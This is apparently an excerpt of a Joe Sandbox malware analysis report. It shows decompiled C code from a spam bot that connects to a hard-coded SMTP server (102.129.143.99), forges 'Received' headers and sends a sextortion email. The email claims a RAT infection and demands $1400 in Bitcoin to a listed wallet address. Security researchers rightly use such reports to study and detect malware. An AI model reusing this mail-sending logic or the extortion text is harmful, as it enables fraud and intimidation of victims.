                                                                                                                                                                                                                                                                                    0x00ea232d
                                                                                                                                                                                                                                                                                    0x00ea2332
                                                                                                                                                                                                                                                                                    0x00ea2332
                                                                                                                                                                                                                                                                                    0x00ea2335
                                                                                                                                                                                                                                                                                    0x00ea233e
                                                                                                                                                                                                                                                                                    0x00ea2343
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\29997219412047.jpg, xrefs: 00EA229D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CountExitThreadTick_wfopenfclosefgetsrandsrandstrcpy
                                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\29997219412047.jpg
                                                                                                                                                                                                                                                                                    • API String ID: 3964472883-2679524889
                                                                                                                                                                                                                                                                                    • Opcode ID: c0074f257c7ffb63d27c9e1fffe466049788c93f8081942afa5068d8fa622ca3
                                                                                                                                                                                                                                                                                    • Instruction ID: 8648ffaa517120b75bf842a7eb9ce9d26649cd9124029de4c9aeef3da974cf1e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0074f257c7ffb63d27c9e1fffe466049788c93f8081942afa5068d8fa622ca3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2021F7F5C8031C57CB10A764DD8ABD972B86B6E305F0414E8B60979181FAB4BBC8CFA1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 189 ea1b2d-ea1b3c StrStrA 190 ea1b3e-ea1b5e wsprintfA 189->190 191 ea1b60-ea1b7a wsprintfA 189->191 192 ea1b80-ea1b9c call ea1120 190->192 191->192 195 ea1baa-ea1bb1 192->195 196 ea1b9e-ea1ba5 192->196 197 ea220c 195->197 196->197 199 ea1a9a-ea1a9e 197->199 200 ea2211-ea222d shutdown closesocket 197->200 199->200 202 ea1aa4-ea1ab4 call ea1160 199->202 203 ea2233-ea2239 200->203 205 ea1ab9-ea1ac9 202->205 206 ea1acb 205->206 207 ea1ad0-ea1aef call ea11c0 205->207 206->200 210 ea1af1 207->210 211 ea1af6-ea1b15 207->211 210->200 211->197 212 ea1b1b 211->212 212->197
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: wsprintf$closesocketshutdown
                                                                                                                                                                                                                                                                                    • String ID: EHLO %s$HELO %s$[102.129.143.99]
                                                                                                                                                                                                                                                                                    • API String ID: 4205972133-3055200391
                                                                                                                                                                                                                                                                                    • Opcode ID: 16605fc741b1eef4950a6a813beb10269b1c591c14fcfb649f9afc6a969e87a5
                                                                                                                                                                                                                                                                                    • Instruction ID: 5f0a254b5512c5ba0ef2f86025b8c79a79ff98b48e4829987677ff32c75dedbe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16605fc741b1eef4950a6a813beb10269b1c591c14fcfb649f9afc6a969e87a5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 442153F5D00218DFCB10CBA4DC45BEE77B8BB9E348F0451A9E6097A181E7747554CB29
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 213 ea1bb6-ea1c0d wsprintfA * 2 call ea1120 216 ea1c1b-ea1c22 213->216 217 ea1c0f-ea1c16 213->217 218 ea220c 216->218 217->218 220 ea1a9a-ea1a9e 218->220 221 ea2211-ea222d shutdown closesocket 218->221 220->221 223 ea1aa4-ea1ab4 call ea1160 220->223 224 ea2233-ea2239 221->224 226 ea1ab9-ea1ac9 223->226 227 ea1acb 226->227 228 ea1ad0-ea1aef call ea11c0 226->228 227->221 231 ea1af1 228->231 232 ea1af6-ea1b15 228->232 231->221 232->218 233 ea1b1b 232->233 233->218
                                                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                    			E00EA1BB6(void* __eflags) {
                                                                                                                                                                                                                                                                                    				void* _t170;
                                                                                                                                                                                                                                                                                    				intOrPtr _t174;
                                                                                                                                                                                                                                                                                    				void* _t175;
                                                                                                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                                                                                                    				void* _t202;
                                                                                                                                                                                                                                                                                    				void* _t205;
                                                                                                                                                                                                                                                                                    				void* _t207;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					wsprintfA(_t200 - 0x88, "<%s>",  *((intOrPtr*)(_t200 + 8)));
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t200 - 0x498)) = wsprintfA(_t200 - 0x490, "MAIL FROM: %s\r\n", _t200 - 0x88);
                                                                                                                                                                                                                                                                                    					_t170 = E00EA1120( *((intOrPtr*)(_t200 - 0x1c)), _t200 - 0x490,  *((intOrPtr*)(_t200 - 0x498))); // executed
                                                                                                                                                                                                                                                                                    					_t205 = _t202 + 0x24;
                                                                                                                                                                                                                                                                                    					if(_t170 != 0) {
                                                                                                                                                                                                                                                                                    						 *(_t200 - 0x20) = 4;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L48:
                                                                                                                                                                                                                                                                                    					while( *(_t200 - 0x20) != 0 &&  *(_t200 - 0x20) != 8) {
                                                                                                                                                                                                                                                                                    						_t174 = E00EA1160( *((intOrPtr*)(_t200 - 0x1c)), _t200 - 0x490, 0x400); // executed
                                                                                                                                                                                                                                                                                    						_t207 = _t205 + 0xc;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t200 - 0x90)) = _t174;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t200 - 0x90)) != 0) {
                                                                                                                                                                                                                                                                                    							L5:
                                                                                                                                                                                                                                                                                    							 *((char*)(_t200 +  *((intOrPtr*)(_t200 - 0x90)) - 0x490)) = 0;
                                                                                                                                                                                                                                                                                    							_t175 = E00EA11C0(_t200 - 0x490);
                                                                                                                                                                                                                                                                                    							_t205 = _t207 + 4;
                                                                                                                                                                                                                                                                                    							if(_t175 != 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *(_t200 - 0x718) =  *(_t200 - 0x20);
                                                                                                                                                                                                                                                                                    								 *(_t200 - 0x718) =  *(_t200 - 0x718) - 1;
                                                                                                                                                                                                                                                                                    								if( *(_t200 - 0x718) > 6) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                                                                                                    								switch( *((intOrPtr*)( *(_t200 - 0x718) * 4 +  &M00EA223C))) {
                                                                                                                                                                                                                                                                                    									case 0:
                                                                                                                                                                                                                                                                                    										L9:
                                                                                                                                                                                                                                                                                    										_push("ESMTP");
                                                                                                                                                                                                                                                                                    										if(StrStrA(_t200 - 0x490) == 0) {
                                                                                                                                                                                                                                                                                    											_t179 = wsprintfA(_t200 - 0x490, "HELO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    											_t208 = _t205 + 0xc;
                                                                                                                                                                                                                                                                                    											 *(_t200 - 0x494) = _t179;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											_t182 = wsprintfA(_t200 - 0x490, "EHLO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    											_t208 = _t205 + 0xc;
                                                                                                                                                                                                                                                                                    											 *(_t200 - 0x494) = _t182;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t181 = E00EA1120( *((intOrPtr*)(_t200 - 0x1c)), _t200 - 0x490,  *(_t200 - 0x494)); // executed
                                                                                                                                                                                                                                                                                    										_t205 = _t208 + 0xc;
                                                                                                                                                                                                                                                                                    										if(_t181 != 0) {
                                                                                                                                                                                                                                                                                    											 *(_t200 - 0x20) = 3;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(_t200 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 1:
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 2:
                                                                                                                                                                                                                                                                                    										goto L0;
                                                                                                                                                                                                                                                                                    									case 3:
                                                                                                                                                                                                                                                                                    										L18:
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "RCPT TO: <%s>\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x49c) = __eax;
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x49c);
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x49c)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 5;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 4:
                                                                                                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 6;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 5:
                                                                                                                                                                                                                                                                                    										L24:
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x61c;
                                                                                                                                                                                                                                                                                    										E00EA1320(__ebp - 0x61c, 5, __ebp - 0x61c) = wsprintfA(__ebp - 0x508, "%s.com", __eax);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										__ebp - 0x710 = E00EA1490(0, __ebp - 0x710, 1); // executed
                                                                                                                                                                                                                                                                                    										Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                                    										__eax = E00EA1490(0, __ebp - 0x690, 0); // executed
                                                                                                                                                                                                                                                                                    										__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t57 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t61 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t65 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xd2;
                                                                                                                                                                                                                                                                                    										_t69 = __eax % 0xd2;
                                                                                                                                                                                                                                                                                    										E00EA1390(0xd2, 7, __ebp - 0x6a8) = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n", __ebp - 0x490, _t69 + 1, _t65 + 1, _t61 + 1, _t57 + 1, __ebp - 0x508, __ebp - 0x690);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0x24;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											__ecx = __ebp - 0x710;
                                                                                                                                                                                                                                                                                    											E00EA1320(__ecx, 3, __ebp - 0x628) = __ebp - 0x69c;
                                                                                                                                                                                                                                                                                    											__eax = E00EA1320(__ecx, 5, __ebp - 0x69c);
                                                                                                                                                                                                                                                                                    											__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    											__eax = wsprintfA(__ebp - 0x490, "Received: (qmail %s invoked by uid %s); %s\r\n", __eax, __eax, __ebp - 0x490);
                                                                                                                                                                                                                                                                                    											__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    											__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    											__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    											__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    											if(__eax != 0) {
                                                                                                                                                                                                                                                                                    												__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    												__eax = wsprintfA(__ebp - 0x490, "From: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    												__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    												 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    												__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    												__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    												__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    												if(__eax != 0) {
                                                                                                                                                                                                                                                                                    													__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    													__eax = wsprintfA(__ebp - 0x490, "To: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    													__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    													 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    													__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    													__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    													if(E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                                    														__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    														__eax = wsprintfA(__ebp - 0x490, "Subject: %s\r\n", "I RECORDED YOU!");
                                                                                                                                                                                                                                                                                    														__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    														 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    														__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    														__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    														__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    														if(__eax != 0) {
                                                                                                                                                                                                                                                                                    															__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                                    															__eax = wsprintfA(__ebp - 0x490, "Date: %s\r\n", __ebp - 0x690);
                                                                                                                                                                                                                                                                                    															__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    															 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    															__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    															__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    															__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    															if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                                    																__ecx = __ebp - 0x628;
                                                                                                                                                                                                                                                                                    																E00EA1320(__ecx, 6, __ecx) = E00EA1320(__ecx, 6, __ebp - 0x69c);
                                                                                                                                                                                                                                                                                    																__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    																__eax = wsprintfA(__ebp - 0x490, "Message-ID: <%s.%s@%s>\r\n", __ebp - 0x490, __ebp - 0x490, __ebp - 0x508);
                                                                                                                                                                                                                                                                                    																__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                                    																 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    																__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    																__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    																if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																	__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																	if(E00EA1120( *(__ebp - 0x1c), "Mime-Version: 1.0\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                    																		__eax = E00EA1120( *(__ebp - 0x1c), "Content-type: text/plain;\r\n\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    																		if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = memset(__ebp - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			strcpy(__ebp - 0x610, "Hello there!\r\n\r\n") = strcat(__ebp - 0x610, "Unfortunately, there are some bad news for you.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "All you need is $1400 USD in Bitcoin (BTC) transfer to my account (Bitcoin equivalent based on exchange rate during your transfer).\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			strcat(__ebp - 0x610, "After the transaction is successful, I will proceed to delete everything without delay.\r\n\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																			__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    																			if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				memset(__ebp - 0x610, 0, 0x104) = strcpy(__ebp - 0x610, "Afterwards, we can pretend that we have never met before.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "In addition, I assure you that all the harmful software will be deleted from your device.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "My Bitcoin (BTC) address is: 1EJJoUCykyZT3FtxRGSpuUsiBxCiHQ4wqX\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "Everything will be carried out based on fairness!\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				strcat(__ebp - 0x610, "An advice from me - regularly change all your passwords to your accounts and update your device with newest security patches.\r\n.\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																				if(E00EA1120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                    																					 *(__ebp - 0x20) = 7;
                                                                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                                                                    																					 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                                                                                                    																				 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                                                                    																			 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                                                                    																		 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                                                                    																	 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                                                    																 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                                                                    															 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                                                    														 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                                                    													 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 6:
                                                                                                                                                                                                                                                                                    										L47:
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x20) = 8;
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L49:
                                                                                                                                                                                                                                                                                    					 *(_t200 - 8) = 0 |  *(_t200 - 0x20) == 0x00000008;
                                                                                                                                                                                                                                                                                    					__imp__#22( *((intOrPtr*)(_t200 - 0x1c)), 2); // executed
                                                                                                                                                                                                                                                                                    					__imp__#3( *((intOrPtr*)(_t200 - 0x1c)));
                                                                                                                                                                                                                                                                                    					return  *(_t200 - 8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bc6
                                                                                                                                                                                                                                                                                    0x00ea1beb
                                                                                                                                                                                                                                                                                    0x00ea1c03
                                                                                                                                                                                                                                                                                    0x00ea1c08
                                                                                                                                                                                                                                                                                    0x00ea1c0d
                                                                                                                                                                                                                                                                                    0x00ea1c1b
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea220c
                                                                                                                                                                                                                                                                                    0x00ea1ab4
                                                                                                                                                                                                                                                                                    0x00ea1ab9
                                                                                                                                                                                                                                                                                    0x00ea1abc
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea1ad0
                                                                                                                                                                                                                                                                                    0x00ea1ad6
                                                                                                                                                                                                                                                                                    0x00ea1ae5
                                                                                                                                                                                                                                                                                    0x00ea1aea
                                                                                                                                                                                                                                                                                    0x00ea1aef
                                                                                                                                                                                                                                                                                    0x00ea1af6
                                                                                                                                                                                                                                                                                    0x00ea1af9
                                                                                                                                                                                                                                                                                    0x00ea1b08
                                                                                                                                                                                                                                                                                    0x00ea1b15
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b1b
                                                                                                                                                                                                                                                                                    0x00ea1b21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b3c
                                                                                                                                                                                                                                                                                    0x00ea1b71
                                                                                                                                                                                                                                                                                    0x00ea1b77
                                                                                                                                                                                                                                                                                    0x00ea1b7a
                                                                                                                                                                                                                                                                                    0x00ea1b3e
                                                                                                                                                                                                                                                                                    0x00ea1b4f
                                                                                                                                                                                                                                                                                    0x00ea1b55
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b92
                                                                                                                                                                                                                                                                                    0x00ea1b97
                                                                                                                                                                                                                                                                                    0x00ea1b9c
                                                                                                                                                                                                                                                                                    0x00ea1baa
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c27
